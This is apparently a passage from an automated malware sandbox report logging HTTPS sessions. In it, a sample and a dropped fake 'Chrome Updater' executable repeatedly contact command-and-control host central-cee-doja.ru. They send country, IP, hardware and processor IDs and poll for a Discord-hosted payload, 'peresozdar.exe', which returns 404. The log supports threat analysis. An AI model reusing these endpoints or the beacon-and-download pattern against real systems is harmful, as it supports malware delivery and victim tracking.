                                                                                    2024-01-04 07:31:35 UTC213INData Raw: 6f 64 69 6e 67 3d 27 55 54 46 2d 38 27 3f 3e 3c 45 72 72 6f 72 3e 3c 43 6f 64 65 3e 4e 6f 53 75 63 68 4b 65 79 3c 2f 43 6f 64 65 3e 3c 4d 65 73 73 61 67 65 3e 54 68 65 20 73 70 65 63 69 66 69 65 64 20 6b 65 79 20 64 6f 65 73 20 6e 6f 74 20 65 78 69 73 74 2e 3c 2f 4d 65 73 73 61 67 65 3e 3c 44 65 74 61 69 6c 73 3e 4e 6f 20 73 75 63 68 20 6f 62 6a 65 63 74 3a 20 64 69 73 63 6f 72 64 2f 61 74 74 61 63 68 6d 65 6e 74 73 2f 31 31 36 35 30 35 31 36 33 39 30 34 30 38 34 33 38 31 39 2f 31 31 36 36 38 30 30 36 34 35 33 38 33 32 37 30 34 32 30 2f 70 65 72 65 73 6f 7a 64 61 72 2e 65 78 65 3c 2f 44 65 74 61 69 6c 73 3e 3c 2f 45 72 72 6f 72 3e
                                                                                    Data Ascii: oding='UTF-8'?><Error><Code>NoSuchKey</Code><Message>The specified key does not exist.</Message><Details>No such object: discord/attachments/1165051639040843819/1166800645383270420/peresozdar.exe</Details></Error>


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    216192.168.2.649941104.21.89.1934433172C:\Users\user\Desktop\LnSNtO8JIa.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    2024-01-04 07:31:35 UTC62OUTGET //list.php?id=1081 HTTP/1.1
                                                                                    Host: central-cee-doja.ru
                                                                                    2024-01-04 07:31:36 UTC599INHTTP/1.1 200 OK
                                                                                    Date: Thu, 04 Jan 2024 07:31:36 GMT
                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                    Transfer-Encoding: chunked
                                                                                    Connection: close
                                                                                    Vary: Accept-Encoding
                                                                                    CF-Cache-Status: DYNAMIC
                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=YKSEqcTNMxsYurY3B5WuYhdroWyj6W7qjj6AiDnd4TZQ7UJ%2Bm2uCSLa9tk78dkYkXjFL20T18QLgsK4pGSV1ZyTSq2vMjYPVsR%2FYPHe8V0%2FS3Kl8mqlQFudkz2mWMkeue3Oo4XKS"}],"group":"cf-nel","max_age":604800}
                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                    Server: cloudflare
                                                                                    CF-RAY: 8401c865ebcb8242-IAD
                                                                                    alt-svc: h3=":443"; ma=86400
                                                                                    2024-01-04 07:31:36 UTC115INData Raw: 36 64 0d 0a 68 74 74 70 73 3a 2f 2f 63 64 6e 2e 64 69 73 63 6f 72 64 61 70 70 2e 63 6f 6d 2f 61 74 74 61 63 68 6d 65 6e 74 73 2f 31 31 36 35 30 35 31 36 33 39 30 34 30 38 34 33 38 31 39 2f 31 31 36 36 38 30 30 36 34 35 33 38 33 32 37 30 34 32 30 2f 70 65 72 65 73 6f 7a 64 61 72 2e 65 78 65 7c 34 36 32 37 38 38 33 0a 4e 4f 54 41 53 4b 53 0d 0a
                                                                                    Data Ascii: 6dhttps://cdn.discordapp.com/attachments/1165051639040843819/1166800645383270420/peresozdar.exe|4627883NOTASKS
                                                                                    2024-01-04 07:31:36 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                    Data Ascii: 0


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    217192.168.2.649942104.21.89.19344327288C:\Users\user\AppData\Roaming\Chrome Updater\Chrome.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    2024-01-04 07:31:36 UTC189OUTGET /online.php?country=US&ipaddr=102.165.48.52&HWID=9e146be9-c76a-4720-bcdb-53011b87bd06&processorid=6F39597F7B&ownerid=1081 HTTP/1.1
                                                                                    Host: central-cee-doja.ru
                                                                                    Connection: Keep-Alive
                                                                                    2024-01-04 07:31:36 UTC576INHTTP/1.1 200 OK
                                                                                    Date: Thu, 04 Jan 2024 07:31:36 GMT
                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                    Transfer-Encoding: chunked
                                                                                    Connection: close
                                                                                    CF-Cache-Status: DYNAMIC
                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=NE2bNJDMxhltSb7aoksh21Z9HlIlvLr5F75FXBGIgsn9WqUXSatZmwVkOnxL2L3pooZF0FIDDY82cVJPBgFUAZx5K%2BLkRecKdG45sfvX8tZv5JblSs9C95%2B%2BUNSazmjPodfZQC1s"}],"group":"cf-nel","max_age":604800}
                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                    Server: cloudflare
                                                                                    CF-RAY: 8401c867adbb1781-IAD
                                                                                    alt-svc: h3=":443"; ma=86400
                                                                                    2024-01-04 07:31:36 UTC12INData Raw: 37 0d 0a 55 50 44 41 54 45 44 0d 0a
                                                                                    Data Ascii: 7UPDATED
                                                                                    2024-01-04 07:31:36 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                    Data Ascii: 0


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    218192.168.2.649943162.159.129.2334433172C:\Users\user\Desktop\LnSNtO8JIa.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    2024-01-04 07:31:36 UTC134OUTGET /attachments/1165051639040843819/1166800645383270420/peresozdar.exe HTTP/1.1
                                                                                    Host: cdn.discordapp.com
                                                                                    Connection: Keep-Alive
                                                                                    2024-01-04 07:31:36 UTC1339INHTTP/1.1 404 Not Found
                                                                                    Date: Thu, 04 Jan 2024 07:31:36 GMT
                                                                                    Content-Type: application/xml; charset=UTF-8
                                                                                    Content-Length: 236
                                                                                    Connection: close
                                                                                    CF-Ray: 8401c86b69b41730-IAD
                                                                                    CF-Cache-Status: HIT
                                                                                    Accept-Ranges: bytes
                                                                                    Age: 66
                                                                                    Cache-Control: public, max-age=31536000
                                                                                    Content-Disposition: attachment
                                                                                    Expires: Fri, 03 Jan 2025 07:31:36 GMT
                                                                                    Vary: Accept-Encoding
                                                                                    Alt-Svc: h3=":443"; ma=86400
                                                                                    X-GUploader-UploadID: ABPtcPqhTB1LXLSJArSkskn7kB2Cz2FEf8U7kttMHLDyayzx2-v-tISfzRDpzXreML572QUvUSs
                                                                                    X-Robots-Tag: noindex, nofollow, noarchive, nocache, noimageindex, noodp
                                                                                    Set-Cookie: __cf_bm=bqxbRzLlCtDYqrwlevX4O.SQMsTWD.hPDanZm7rOkwM-1704353496-1-AaePRS7GUSBLsC6hjrbuPK73OFLll5Qv1b0hmg0YsWavayJePWlT3iTXgTZpDCYD25rrb+cW0aQzicWfbiDemZY=; path=/; expires=Thu, 04-Jan-24 08:01:36 GMT; domain=.discordapp.com; HttpOnly; Secure
                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=od8cG0jkyG%2FHZCqp%2F5K%2Fb0uzn5zejOAgF90eUgLWqSDOJBNUM3kR0ZksECS7RhWsnf0DztaiRZVHHmsn187sKKjFHzlUjJaWnWRlC9UO4%2BW8%2B3%2BkHOeTjtlpxUrAQqkqFqehSA%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                    Set-Cookie: _cfuvid=LlFR4JR_mEH1FaSrkSiauvgVARYju.5cfwoO7JA0OTw-1704353496888-0-604800000; path=/; domain=.discordapp.com; HttpOnly; Secure; SameSite=None
                                                                                    Server: cloudflare
                                                                                    2024-01-04 07:31:36 UTC30INData Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 27 31 2e 30 27 20 65 6e 63 6f 64 69 6e 67 3d 27
                                                                                    Data Ascii: <?xml version='1.0' encoding='
                                                                                    2024-01-04 07:31:36 UTC206INData Raw: 55 54 46 2d 38 27 3f 3e 3c 45 72 72 6f 72 3e 3c 43 6f 64 65 3e 4e 6f 53 75 63 68 4b 65 79 3c 2f 43 6f 64 65 3e 3c 4d 65 73 73 61 67 65 3e 54 68 65 20 73 70 65 63 69 66 69 65 64 20 6b 65 79 20 64 6f 65 73 20 6e 6f 74 20 65 78 69 73 74 2e 3c 2f 4d 65 73 73 61 67 65 3e 3c 44 65 74 61 69 6c 73 3e 4e 6f 20 73 75 63 68 20 6f 62 6a 65 63 74 3a 20 64 69 73 63 6f 72 64 2f 61 74 74 61 63 68 6d 65 6e 74 73 2f 31 31 36 35 30 35 31 36 33 39 30 34 30 38 34 33 38 31 39 2f 31 31 36 36 38 30 30 36 34 35 33 38 33 32 37 30 34 32 30 2f 70 65 72 65 73 6f 7a 64 61 72 2e 65 78 65 3c 2f 44 65 74 61 69 6c 73 3e 3c 2f 45 72 72 6f 72 3e
                                                                                    Data Ascii: UTF-8'?><Error><Code>NoSuchKey</Code><Message>The specified key does not exist.</Message><Details>No such object: discord/attachments/1165051639040843819/1166800645383270420/peresozdar.exe</Details></Error>


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    219192.168.2.649944104.21.89.19344327288C:\Users\user\AppData\Roaming\Chrome Updater\Chrome.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    2024-01-04 07:31:36 UTC62OUTGET //list.php?id=1081 HTTP/1.1
                                                                                    Host: central-cee-doja.ru
                                                                                    2024-01-04 07:31:37 UTC611INHTTP/1.1 200 OK
                                                                                    Date: Thu, 04 Jan 2024 07:31:37 GMT
                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                    Transfer-Encoding: chunked
                                                                                    Connection: close
                                                                                    Vary: Accept-Encoding
                                                                                    CF-Cache-Status: DYNAMIC
                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=FyPdLWvm7fLSHMRcv%2BW%2BHREEB8v47ReVyz%2BRKUqEJhzOqLi4g%2BfMFJYqj%2BDh6YIif%2BOkgZCIxbfRrrhdtWe30yWMnbaHstuk%2B3jWit%2FSSomwzrkAXso3%2BFWuX4Tawu1iLjbFrhk2"}],"group":"cf-nel","max_age":604800}
                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                    Server: cloudflare
                                                                                    CF-RAY: 8401c86d2a7d6f9e-IAD
                                                                                    alt-svc: h3=":443"; ma=86400
                                                                                    2024-01-04 07:31:37 UTC115INData Raw: 36 64 0d 0a 68 74 74 70 73 3a 2f 2f 63 64 6e 2e 64 69 73 63 6f 72 64 61 70 70 2e 63 6f 6d 2f 61 74 74 61 63 68 6d 65 6e 74 73 2f 31 31 36 35 30 35 31 36 33 39 30 34 30 38 34 33 38 31 39 2f 31 31 36 36 38 30 30 36 34 35 33 38 33 32 37 30 34 32 30 2f 70 65 72 65 73 6f 7a 64 61 72 2e 65 78 65 7c 34 36 32 37 38 38 33 0a 4e 4f 54 41 53 4b 53 0d 0a
                                                                                    Data Ascii: 6dhttps://cdn.discordapp.com/attachments/1165051639040843819/1166800645383270420/peresozdar.exe|4627883NOTASKS
                                                                                    2024-01-04 07:31:37 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                    Data Ascii: 0


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    220192.168.2.649945104.21.89.1934433172C:\Users\user\Desktop\LnSNtO8JIa.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    2024-01-04 07:31:37 UTC189OUTGET /online.php?country=US&ipaddr=102.165.48.52&HWID=9e146be9-c76a-4720-bcdb-53011b87bd06&processorid=6F39597F7B&ownerid=1081 HTTP/1.1
                                                                                    Host: central-cee-doja.ru
                                                                                    Connection: Keep-Alive
                                                                                    2024-01-04 07:31:37 UTC576INHTTP/1.1 200 OK
                                                                                    Date: Thu, 04 Jan 2024 07:31:37 GMT
                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                    Transfer-Encoding: chunked
                                                                                    Connection: close
                                                                                    CF-Cache-Status: DYNAMIC
                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=iOoaRvw%2F4iueY7qAjioKQ5FFY3cnrwJYpdT87POE0PQy%2FaEAFry6ExtVnPnl849DKMUeVonRRx5m1%2FuZt1U1GzCbtc9igaX1r0dNf7X55N9psTzrJYJFN0t3ynLV8LoOPE5iO1W5"}],"group":"cf-nel","max_age":604800}
                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                    Server: cloudflare
                                                                                    CF-RAY: 8401c86efa8c58cc-IAD
                                                                                    alt-svc: h3=":443"; ma=86400
                                                                                    2024-01-04 07:31:37 UTC12INData Raw: 37 0d 0a 55 50 44 41 54 45 44 0d 0a
                                                                                    Data Ascii: 7UPDATED
                                                                                    2024-01-04 07:31:37 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                    Data Ascii: 0


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    221192.168.2.649946162.159.129.23344327288C:\Users\user\AppData\Roaming\Chrome Updater\Chrome.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    2024-01-04 07:31:37 UTC134OUTGET /attachments/1165051639040843819/1166800645383270420/peresozdar.exe HTTP/1.1
                                                                                    Host: cdn.discordapp.com
                                                                                    Connection: Keep-Alive
                                                                                    2024-01-04 07:31:37 UTC1339INHTTP/1.1 404 Not Found
                                                                                    Date: Thu, 04 Jan 2024 07:31:37 GMT
                                                                                    Content-Type: application/xml; charset=UTF-8
                                                                                    Content-Length: 236
                                                                                    Connection: close
                                                                                    CF-Ray: 8401c870a83a07dd-IAD
                                                                                    CF-Cache-Status: HIT
                                                                                    Accept-Ranges: bytes
                                                                                    Age: 81
                                                                                    Cache-Control: public, max-age=31536000
                                                                                    Content-Disposition: attachment
                                                                                    Expires: Fri, 03 Jan 2025 07:31:37 GMT
                                                                                    Vary: Accept-Encoding
                                                                                    Alt-Svc: h3=":443"; ma=86400
                                                                                    X-GUploader-UploadID: ABPtcPpnDEXM9ZU-YXeyr-01FXF-iSbsKGRr8QoLoQnbp3S9RQtXPnw6PpkDhWLrWXESBz_nnE8
                                                                                    X-Robots-Tag: noindex, nofollow, noarchive, nocache, noimageindex, noodp
                                                                                    Set-Cookie: __cf_bm=wVlLXKj2SH7sqquql2XrIzGm3jvU8NtCUMzU6fWW5mg-1704353497-1-ASgy2KzTLdR3GG/k7vzgYYQFTCkMx1WjgDR4u1Uhjkwzsd6jFRKRhTRTga74qzgo5OHnGzXkdCcCzX4QcqcKyTM=; path=/; expires=Thu, 04-Jan-24 08:01:37 GMT; domain=.discordapp.com; HttpOnly; Secure
                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=7SEbNVjRTU0toNHi0JeKuG8sgqRgPG1rd7Gx3x0Xwa5x%2BpKsGICUHOR5xggAvLqdI9eCLhSq53ldYteHTx%2Fj9iITiGtvV8%2FwRKvjgCxosHbW9rbAnt6An%2F%2FUaTllF8GF1%2FHTRg%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                    Set-Cookie: _cfuvid=EowPPGXK7Jj1nytr5oOnr.VUpDED881EArtlVJ28byw-1704353497729-0-604800000; path=/; domain=.discordapp.com; HttpOnly; Secure; SameSite=None
                                                                                    Server: cloudflare
                                                                                    2024-01-04 07:31:37 UTC30INData Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 27 31 2e 30 27 20 65 6e 63 6f 64 69 6e 67 3d 27
                                                                                    Data Ascii: <?xml version='1.0' encoding='
                                                                                    2024-01-04 07:31:37 UTC206INData Raw: 55 54 46 2d 38 27 3f 3e 3c 45 72 72 6f 72 3e 3c 43 6f 64 65 3e 4e 6f 53 75 63 68 4b 65 79 3c 2f 43 6f 64 65 3e 3c 4d 65 73 73 61 67 65 3e 54 68 65 20 73 70 65 63 69 66 69 65 64 20 6b 65 79 20 64 6f 65 73 20 6e 6f 74 20 65 78 69 73 74 2e 3c 2f 4d 65 73 73 61 67 65 3e 3c 44 65 74 61 69 6c 73 3e 4e 6f 20 73 75 63 68 20 6f 62 6a 65 63 74 3a 20 64 69 73 63 6f 72 64 2f 61 74 74 61 63 68 6d 65 6e 74 73 2f 31 31 36 35 30 35 31 36 33 39 30 34 30 38 34 33 38 31 39 2f 31 31 36 36 38 30 30 36 34 35 33 38 33 32 37 30 34 32 30 2f 70 65 72 65 73 6f 7a 64 61 72 2e 65 78 65 3c 2f 44 65 74 61 69 6c 73 3e 3c 2f 45 72 72 6f 72 3e
                                                                                    Data Ascii: UTF-8'?><Error><Code>NoSuchKey</Code><Message>The specified key does not exist.</Message><Details>No such object: discord/attachments/1165051639040843819/1166800645383270420/peresozdar.exe</Details></Error>


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    222192.168.2.649947104.21.89.1934433172C:\Users\user\Desktop\LnSNtO8JIa.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    2024-01-04 07:31:37 UTC62OUTGET //list.php?id=1081 HTTP/1.1
                                                                                    Host: central-cee-doja.ru
                                                                                    2024-01-04 07:31:38 UTC599INHTTP/1.1 200 OK
                                                                                    Date: Thu, 04 Jan 2024 07:31:38 GMT
                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                    Transfer-Encoding: chunked
                                                                                    Connection: close
                                                                                    Vary: Accept-Encoding
                                                                                    CF-Cache-Status: DYNAMIC
                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=xE%2BxfRHcgnxA28JqUjEJrpiGGlB9RD7I7jndM9wTYkWPLCE42gIXtyxaspqtLG6Fr%2B0j0paxwrmVGaK%2BCMcdqUF4sWaYQ5b2sdON4LuHdJZh7r7b0tyO3HT0JbOvaFqR5fKpaYp3"}],"group":"cf-nel","max_age":604800}
                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                    Server: cloudflare
                                                                                    CF-RAY: 8401c8736a5f2d23-IAD
                                                                                    alt-svc: h3=":443"; ma=86400
                                                                                    2024-01-04 07:31:38 UTC115INData Raw: 36 64 0d 0a 68 74 74 70 73 3a 2f 2f 63 64 6e 2e 64 69 73 63 6f 72 64 61 70 70 2e 63 6f 6d 2f 61 74 74 61 63 68 6d 65 6e 74 73 2f 31 31 36 35 30 35 31 36 33 39 30 34 30 38 34 33 38 31 39 2f 31 31 36 36 38 30 30 36 34 35 33 38 33 32 37 30 34 32 30 2f 70 65 72 65 73 6f 7a 64 61 72 2e 65 78 65 7c 34 36 32 37 38 38 33 0a 4e 4f 54 41 53 4b 53 0d 0a
                                                                                    Data Ascii: 6dhttps://cdn.discordapp.com/attachments/1165051639040843819/1166800645383270420/peresozdar.exe|4627883NOTASKS
                                                                                    2024-01-04 07:31:38 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                    Data Ascii: 0


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    223192.168.2.649948104.21.89.19344327288C:\Users\user\AppData\Roaming\Chrome Updater\Chrome.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    2024-01-04 07:31:38 UTC189OUTGET /online.php?country=US&ipaddr=102.165.48.52&HWID=9e146be9-c76a-4720-bcdb-53011b87bd06&processorid=6F39597F7B&ownerid=1081 HTTP/1.1
                                                                                    Host: central-cee-doja.ru
                                                                                    Connection: Keep-Alive
                                                                                    2024-01-04 07:31:38 UTC572INHTTP/1.1 200 OK
                                                                                    Date: Thu, 04 Jan 2024 07:31:38 GMT
                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                    Transfer-Encoding: chunked
                                                                                    Connection: close
                                                                                    CF-Cache-Status: DYNAMIC
                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=qsRuYEg%2FIK6jww9uqhXzDyzb8A1Wo7ngI8nmRK7bnBDbae1r6Ble4oRRwaZvdmecAP3W4wSPhrN7hZQoEcVekQQAwcycz3TSYtzChvv3uA3zyJJBJi52ArD0cQ3sVTY7VqWfKcRt"}],"group":"cf-nel","max_age":604800}
                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                    Server: cloudflare
                                                                                    CF-RAY: 8401c8743fe505da-IAD
                                                                                    alt-svc: h3=":443"; ma=86400
                                                                                    2024-01-04 07:31:38 UTC12INData Raw: 37 0d 0a 55 50 44 41 54 45 44 0d 0a
                                                                                    Data Ascii: 7UPDATED
                                                                                    2024-01-04 07:31:38 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                    Data Ascii: 0


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    224192.168.2.649949162.159.129.2334433172C:\Users\user\Desktop\LnSNtO8JIa.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    2024-01-04 07:31:38 UTC134OUTGET /attachments/1165051639040843819/1166800645383270420/peresozdar.exe HTTP/1.1
                                                                                    Host: cdn.discordapp.com
                                                                                    Connection: Keep-Alive
                                                                                    2024-01-04 07:31:39 UTC1352INHTTP/1.1 404 Not Found
                                                                                    Date: Thu, 04 Jan 2024 07:31:39 GMT
                                                                                    Content-Type: application/xml; charset=UTF-8
                                                                                    Content-Length: 236
                                                                                    Connection: close
                                                                                    CF-Ray: 8401c878de1e9c64-IAD
                                                                                    CF-Cache-Status: HIT
                                                                                    Accept-Ranges: bytes
                                                                                    Age: 61
                                                                                    Cache-Control: public, max-age=31536000
                                                                                    Content-Disposition: attachment
                                                                                    Expires: Fri, 03 Jan 2025 07:31:39 GMT
                                                                                    Vary: Accept-Encoding
                                                                                    Alt-Svc: h3=":443"; ma=86400
                                                                                    X-GUploader-UploadID: ABPtcPqURQ2RkFvfQOod70WCLX2ErgeFYAiUncDxuJocma8vmDwPeeQBu9xIipew02g4qpq12Sby-B46mw
                                                                                    X-Robots-Tag: noindex, nofollow, noarchive, nocache, noimageindex, noodp
                                                                                    Set-Cookie: __cf_bm=hRKH9R7.IOpwA8xEmVehr97fl0PaMpng4LIgquxzVQA-1704353499-1-AYHQ7iivvep//J0A1tY3xMxFtoUPnZOcm20CvoxAzJwFbCODLI8HD84HMfKFid/TXlevPJY3SG8xx9lSChto05Q=; path=/; expires=Thu, 04-Jan-24 08:01:39 GMT; domain=.discordapp.com; HttpOnly; Secure
                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=HGB1lwiFuM%2BPgUm69cdEB0%2BCII5IfIZ%2BvXSY4VqgJfmxQpkNdMSoY6P1uV05lpnpyDYhEdWdsy8CkYdY%2B7X%2Bjetc57%2B9QpDFbIOJBAFWYpT%2FXsTPvU%2FN2n7B2l%2Btbpdogw4Scw%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                    Set-Cookie: _cfuvid=BbJmbAt2n6v3sW0jd6vO0Waylm3Nq_MGvPChnfgbsNk-1704353499043-0-604800000; path=/; domain=.discordapp.com; HttpOnly; Secure; SameSite=None
                                                                                    Server: cloudflare
                                                                                    2024-01-04 07:31:39 UTC17INData Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 27 31 2e
                                                                                    Data Ascii: <?xml version='1.
                                                                                    2024-01-04 07:31:39 UTC219INData Raw: 30 27 20 65 6e 63 6f 64 69 6e 67 3d 27 55 54 46 2d 38 27 3f 3e 3c 45 72 72 6f 72 3e 3c 43 6f 64 65 3e 4e 6f 53 75 63 68 4b 65 79 3c 2f 43 6f 64 65 3e 3c 4d 65 73 73 61 67 65 3e 54 68 65 20 73 70 65 63 69 66 69 65 64 20 6b 65 79 20 64 6f 65 73 20 6e 6f 74 20 65 78 69 73 74 2e 3c 2f 4d 65 73 73 61 67 65 3e 3c 44 65 74 61 69 6c 73 3e 4e 6f 20 73 75 63 68 20 6f 62 6a 65 63 74 3a 20 64 69 73 63 6f 72 64 2f 61 74 74 61 63 68 6d 65 6e 74 73 2f 31 31 36 35 30 35 31 36 33 39 30 34 30 38 34 33 38 31 39 2f 31 31 36 36 38 30 30 36 34 35 33 38 33 32 37 30 34 32 30 2f 70 65 72 65 73 6f 7a 64 61 72 2e 65 78 65 3c 2f 44 65 74 61 69 6c 73 3e 3c 2f 45 72 72 6f 72 3e
                                                                                    Data Ascii: 0' encoding='UTF-8'?><Error><Code>NoSuchKey</Code><Message>The specified key does not exist.</Message><Details>No such object: discord/attachments/1165051639040843819/1166800645383270420/peresozdar.exe</Details></Error>


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    225192.168.2.649950104.21.89.19344327288C:\Users\user\AppData\Roaming\Chrome Updater\Chrome.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    2024-01-04 07:31:39 UTC62OUTGET //list.php?id=1081 HTTP/1.1
                                                                                    Host: central-cee-doja.ru
                                                                                    2024-01-04 07:31:39 UTC601INHTTP/1.1 200 OK
                                                                                    Date: Thu, 04 Jan 2024 07:31:39 GMT
                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                    Transfer-Encoding: chunked
                                                                                    Connection: close
                                                                                    Vary: Accept-Encoding
                                                                                    CF-Cache-Status: DYNAMIC
                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=z142Xq%2BgoQl3mf5E4o6tPRIP9esFveaUVKrTR%2B6sHN8xT75Jw%2BR4LizhhNk1RdQkdccJ8QagWpV68hnu1DoulZPsXZQ78FaXbe%2FX9540ANMShJ4JvTQ0kAXcuFLabIXTgnOqQ31a"}],"group":"cf-nel","max_age":604800}
                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                    Server: cloudflare
                                                                                    CF-RAY: 8401c87aef969c5e-IAD
                                                                                    alt-svc: h3=":443"; ma=86400
                                                                                    2024-01-04 07:31:39 UTC115INData Raw: 36 64 0d 0a 68 74 74 70 73 3a 2f 2f 63 64 6e 2e 64 69 73 63 6f 72 64 61 70 70 2e 63 6f 6d 2f 61 74 74 61 63 68 6d 65 6e 74 73 2f 31 31 36 35 30 35 31 36 33 39 30 34 30 38 34 33 38 31 39 2f 31 31 36 36 38 30 30 36 34 35 33 38 33 32 37 30 34 32 30 2f 70 65 72 65 73 6f 7a 64 61 72 2e 65 78 65 7c 34 36 32 37 38 38 33 0a 4e 4f 54 41 53 4b 53 0d 0a
                                                                                    Data Ascii: 6dhttps://cdn.discordapp.com/attachments/1165051639040843819/1166800645383270420/peresozdar.exe|4627883NOTASKS
                                                                                    2024-01-04 07:31:39 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                    Data Ascii: 0


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    226192.168.2.649951104.21.89.1934433172C:\Users\user\Desktop\LnSNtO8JIa.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    2024-01-04 07:31:40 UTC189OUTGET /online.php?country=US&ipaddr=102.165.48.52&HWID=9e146be9-c76a-4720-bcdb-53011b87bd06&processorid=6F39597F7B&ownerid=1081 HTTP/1.1
                                                                                    Host: central-cee-doja.ru
                                                                                    Connection: Keep-Alive
                                                                                    2024-01-04 07:31:41 UTC574INHTTP/1.1 200 OK
                                                                                    Date: Thu, 04 Jan 2024 07:31:41 GMT
                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                    Transfer-Encoding: chunked
                                                                                    Connection: close
                                                                                    CF-Cache-Status: DYNAMIC
                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=VZzlI5P7Wuo2DubhaGRzoHvqFHGGVdoiwAkC8M1lFOWhAmaqmwTTIxTo71Vo%2FJM4hfagOAgzA%2Bpe8NcjVGPWN7XWPgveeu2lDJ3qlJ3BSeP9MoM4VceYGhk3xtzKSSWaIZZQxY9x"}],"group":"cf-nel","max_age":604800}
                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                    Server: cloudflare
                                                                                    CF-RAY: 8401c8854d6c59a4-IAD
                                                                                    alt-svc: h3=":443"; ma=86400
                                                                                    2024-01-04 07:31:41 UTC12INData Raw: 37 0d 0a 55 50 44 41 54 45 44 0d 0a
                                                                                    Data Ascii: 7UPDATED
                                                                                    2024-01-04 07:31:41 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                    Data Ascii: 0


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    227192.168.2.649952162.159.129.23344327288C:\Users\user\AppData\Roaming\Chrome Updater\Chrome.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    2024-01-04 07:31:41 UTC134OUTGET /attachments/1165051639040843819/1166800645383270420/peresozdar.exe HTTP/1.1
                                                                                    Host: cdn.discordapp.com
                                                                                    Connection: Keep-Alive
                                                                                    2024-01-04 07:31:41 UTC1336INHTTP/1.1 404 Not Found
                                                                                    Date: Thu, 04 Jan 2024 07:31:41 GMT
                                                                                    Content-Type: application/xml; charset=UTF-8
                                                                                    Content-Length: 236
                                                                                    Connection: close
                                                                                    CF-Ray: 8401c8876d818275-IAD
                                                                                    CF-Cache-Status: HIT
                                                                                    Accept-Ranges: bytes
                                                                                    Age: 74
                                                                                    Cache-Control: public, max-age=31536000
                                                                                    Content-Disposition: attachment
                                                                                    Expires: Fri, 03 Jan 2025 07:31:41 GMT
                                                                                    Vary: Accept-Encoding
                                                                                    Alt-Svc: h3=":443"; ma=86400
